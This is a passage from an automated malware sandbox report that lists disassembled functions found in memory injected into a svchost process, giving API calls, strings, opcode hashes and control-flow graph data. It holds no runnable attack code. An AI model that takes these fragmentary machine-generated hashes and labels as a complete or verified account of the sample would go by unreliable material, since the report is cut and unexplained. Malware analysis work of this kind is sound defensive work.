2a661309634 * 2 call 2a66130c6a8 636->638 639 2a66130a8e9-2a66130a8ed 636->639 641 2a66130a781-2a66130a7c6 call 2a661309cf8 * 2 637->641 642 2a66130a874-2a66130a879 637->642 638->592 643 2a66130a8ef-2a66130a8fe call 2a661309ce4 639->643 644 2a66130a900 639->644 669 2a66130a7c8-2a66130a7ee call 2a661309cf8 call 2a66130ac38 641->669 670 2a66130a804-2a66130a80a 641->670 648 2a66130a884 642->648 652 2a66130a903-2a66130a90d call 2a66130b4ac 643->652 644->652 648->633 652->602 667 2a66130a913-2a66130a961 call 2a661309944 call 2a661309b50 652->667 656->596 673 2a66130a654-2a66130a674 call 2a661309634 * 2 call 2a66130b4ac 656->673 657->656 661 2a66130a630-2a66130a63b 657->661 661->656 666 2a66130a63d-2a66130a642 661->666 666->592 666->656 667->602 689 2a66130a7f0-2a66130a802 669->689 690 2a66130a815-2a66130a872 call 2a66130a470 669->690 674 2a66130a87b 670->674 675 2a66130a80c-2a66130a810 670->675 694 2a66130a676-2a66130a680 call 2a66130b59c 673->694 695 2a66130a68b 673->695 679 2a66130a880 674->679 675->641 679->648 689->669 689->670 690->679 698 2a66130a686-2a66130a9ef call 2a6613092ac call 2a66130aff4 call 2a6613094a0 694->698 699 2a66130a9f0-2a66130a9f5 call 2a66130c6a8 694->699 695->596 698->699 699->638
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: f9dc5a9824cbe41745e6e6afb53450f4abea2dc5f6e99ba2920a5b912b4b268f
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: AEE19F72B047448BEB20DF25A44C39D7BE8F746B99F084115DE8A67BA5CF38C189C782
                                                        Function 000002A66130F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: fa6adfc857896f79626ba7455a121a59232fbacac11bf9aa969e94737a29d1b3
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 2241E122B15A0083EA16DB56A80C75533DDBB46FE1F0E41259D0BB7784EF3CC44D838A
                                                        Function 000002A66130104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 739 2a66130104c-2a6613010b9 RegQueryInfoKeyW 740 2a6613010bf-2a6613010c9 739->740 741 2a6613011b5-2a6613011d0 739->741 740->741 742 2a6613010cf-2a66130111f RegEnumValueW 740->742 743 2a6613011a5-2a6613011af 742->743 744 2a661301125-2a66130112a 742->744 743->741 743->742 744->743 745 2a66130112c-2a661301135 744->745 746 2a661301147-2a66130114c 745->746 747 2a661301137 745->747 749 2a661301199-2a6613011a3 746->749 750 2a66130114e-2a661301193 GetProcessHeap call 2a661316168 GetProcessHeap HeapFree 746->750 748 2a66130113b-2a66130113f 747->748 748->743 751 2a661301141-2a661301145 748->751 749->743 750->749 751->746 751->748
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 29549edc3a05bb9f30fb41ffd792d5d1f480f0e7d2fd4d10c68227b69ff2f9b1
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 2B418B72614B80C7E764CF61E44839A77B5F389F89F488129DA8A17B58DF3CC489CB41
                                                        Function 000002A66130D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D087
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: bc4377a1b8938ee1d589c6b188f15fe87120af383a10576ee3c01281e8991c6e
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: F2118620F0428443FA68A735595D36962DD5B46FF1F1C4324993B277DADF2CC40A8686
                                                        Function 000002A661307510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 94d9e67a34e61d90d8dc91a526529cd9d217a7a82295564c3aa49440afe65ca8
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 79810230F0064187FA50AB69984D39966ECAB87F82F1C44249A8B73396DF3DC84D8783
                                                        Function 000002A661309DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 50e13fa17c3bf59197d400e801c98b0be272adff0d23520052f25ab3404dd5bc
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 3F319021B12A40A3EE11DF46A80C76562DCB74AFA1F5D05259D1F6B790DF3DC849C392
                                                        Function 000002A661313DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: ff65df3e6d8c9de4419cb773b33199b337b810cada23280e1cd4933ea371c746
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 8A116D32B14B8087E7509B52E84D31976B8F78AFE4F084224EA5F97794CF7CC8188781
                                                        Function 000002A661303790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 025d1bc40c232432275dae4ecc1318edf57f0e1ebcf64f5229914e418f725714
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: F8115B76B04B8187EF149B62E40C66976B8FB8AF85F480029DE8E17794EF3DC609C705
                                                        Function 000002A661305B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 5f5900bbcb72c6ae03449aabeaeaebc51276a3d35255987f9de81e93377eb069
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 3BD1B836604B8882EA70DB0AE49835A77F4F389F85F144216EACE57BA5CF3DC545CB81
                                                        Function 000002A661302F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 0dbaea95a655bbe900e3289c597c93d81e3b199630ae2b61a37e5e2c9be7583f
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: AA31BF32B01B5183EA10DF66A64C76A67E8FB46FC5F0C40249E4A17B55EF3CC4A98381
                                                        Function 000002A66130CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 0c3f37101a929da6b2ab2e1659a4edb589a4527edbf683f148d599b530f189ca
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: A4116020B0028443FA64A7315A5D72962DE6B86FF1F1C4724A937676D6DF6C84098783
                                                        Function 000002A66130199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 471f3759c9f5d2bef42bfea3fd4cb3963e2dd95c959e6c4d1128e52080657580
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: C4015771B00A8083EA50DB92A85C35AA3A9F789FC5F884035DE8A63764DF7CC98DC741
                                                        Function 000002A6613036C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 79ca0cd446847db94c87b220a4133f292dc0ecc6b103301cedece9ec62c6ad04
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: B8011BB5B15B8087EB249B62E80D71972B8BB46F86F080424CA4A27754EF7DC50CC742
                                                        Function 000002A661309005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 077875c1ecc3ba653c40cf27df437926aa55189474758356bf14258b29207a20
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: AC517C32B0160087EB18DF15E84CB5937DAF346F99F198528DA5B63788EF79C849C782
                                                        Function 000002A661308FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: ba38e771323935cd7c4c993903e564a77b026bca2c24c40e091b995464114721
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 39315432B0064087E714DF12E84CB1977A9F386F89F0A8418EA5B23789DF79C948C786
                                                        Function 000002A661301A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: b1b7e669e6661b3feae12b7b33b5b685191a7800304716cf001d880ba287570f
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 07F08C72B0468083FB208B60E88C35A63B9F749F88F888024DA4A57964DF6CC68DCB01
                                                        Function 000002A661303044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: cf77e8b58ec68dbf932fe7d168add0dfe5d0c02535d993d737ff7324a50749b0
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 65F08CA0B04BC083EA008B93B90D119B2A9AB4AFC0F0C8430EE4B27B28DF7CC44D8701
                                                        Function 000002A66130BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: e21ae87d0ac0485e57b5ed7f78d9bcfc49820b6887902ab70198c3f652ea4012
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 24F06275B1164583EF108B64E84D3597368EB86F61F5C4619CA6B5B1E8CF6CC14DC341
                                                        Function 000002A6613050D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 9fa3ce34b8c865c90ad51e3620c2008df4696012e5c82a0db968548b5f0cb8e8
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 1002E832A19B8487EB60CB55F49835AB7E4F3C5B91F140015EA8E97BA8DF7DC488CB41
                                                        Function 000002A661305710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 94fa4eeebce64f2b49e1f32bc3357c48cfb3c794009292f3f2d6159d2374f774
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: AE61F636A19B44C7E7608B15E44C31AB7E8F389B85F580115EA8E57BA8DF7CC548CF82
                                                        Function 000002A6612E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 22cd65d3b8f6dd6f7d9b94902791a143805ac03df98696b6fd4da49aabfe5191
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: F2118F22F10AD113FA649539F44D36911CD7B5FB76E4C8638A966073F68F2CCACD4202
                                                        Function 000002A661314104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 66361736f5e8a90f3f2d0b71ac309b0d3cb3498acf01c0f7b7fefb88f4f0f5d8
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: F211A022F10A5123F6641568E95F369354C6B7BBBCF5C0634E977277E6CF2CC84A8202
                                                        Function 000002A6612DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 0bf1e752806efdf3d6918c8cb5621e3440e718aefe77ceb97043c9c5cc2f889e
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 80618E66F0024047FB658B75E54C32B66ADEB87F40F5D4519CA4A177A8DF3CC9CE820A
                                                        Function 000002A66130AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: af1233a52f56241061660763b27a88547fce862d6649db4ccb4df901e0d389cc
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 86614932B00B848AEB20DF65E44839D77E4F345B89F084215EE4A27BA8DF78C599C781
                                                        Function 000002A6612DA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 9e9e64640e33ee222bca170c8ee76b8c2aa3a2d202631a961c3e70975ee64d6a
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: CE515B32E042808BEBA48B26D44CB5877ADFB56F84F1C5116DA9987AE5CF7CD4D88702
                                                        Function 000002A66130AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
